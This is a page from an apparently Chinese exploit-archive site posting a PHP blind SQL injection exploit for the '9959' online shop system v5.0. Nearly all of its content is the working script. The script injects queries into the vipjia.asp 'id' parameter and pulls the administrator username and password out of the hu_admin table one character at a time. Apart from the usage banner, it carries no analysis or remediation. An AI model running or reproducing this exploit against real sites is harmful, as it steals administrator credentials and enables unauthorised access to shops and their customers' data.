首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
9959网店系统 v5.0 Blind SQL injection exploit
来源:vfocus.net 作者:闷豆 发布时间:2011-06-03  

<?php
print_r('
+---------------------------------------------------------------------------+
 9959网店系统 v5.0 Blind SQL injection exploit by mendou
 官方网站:<a href="http://www.9959shop.com" target="_blank">www.9959shop.com</a>
+---------------------------------------------------------------------------+
');

if ($argc < 2) {
    print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' host id
Example:
php '.$argv[0].' localhost  id
+---------------------------------------------------------------------------+
');
    exit;
}

error_reporting(0);
ini_set('max_execution_time', 0);
$host = $argv[1];
$str = "abcdefghijklmnopqrstuvwxyz0123456789";
$strlen =strlen($str);
$pid = $argv[2];

$n_len = lenstr(adminname); //用户长度
echo "用户长度:".$n_len."\r\n";
pojie("adminname",$n_len);echo "\r\n";
$p_len = lenstr(password); //密码长度
echo "密码长度:".$p_len."\r\n";
pojie("password",$p_len);


function pojie($str1,$len){
        global $host,$strlen,$str,$pid;
        for ($j=1 ; $j<=$len ; $j++){
                for ($i=0 ; $i<$strlen ; $i++){
                        $exp =  "%20and%20(select%20top%201%20mid(".$str1.",".$j.",1)%20from%20hu_admin)='".$str[$i]."'";
                        $a = file_get_contents('http://'.$host.'/user/vipjia.asp?action=loads&id='.$pid.$exp);
                        if (strpos($a,"次")==true){
                                echo $str[$i];break;
                        }
                }
        }
}

//判断 用户或者密码的长度函数
function lenstr($str){
        global $host,$pid;
        for ($i=1 ; $i <= 30; $i++){
                $exp =  "%20and%20(select%20top%201%20len(".$str.")%20from%20hu_admin)=".$i;
                $a = file_get_contents('http://'.$host.'/user/vipjia.asp?action=loads&id='.$pid.$exp);
                if (strpos($a,"次")==true){
                        return $i;
                }
        }
}

?>


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Easy RM to MP3 Converter (2.7.
·discuz! X1.5 Get Shell 叉day[A
·FLVPlayer4Free v2.9 (.fp4f) St
·Xitami Web Server 2.5b4 Remote
·Audio Converter 8.1 (.pls) Sta
·Xitami Web Server 2.5b4 Remote
·GoldenFTP 4.70 PASS Stack Buff
·OpenDrive <= 1.3.141 Local Pas
·MODACOM URoad-5000 v1450 Remot
·1ClickUnzip 3.00 .ZIP File Hea
·Easy~Ftp Server v1.7.0.2 Post-
·The KMPlayer 3.0.0.1440 .mp3 B
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved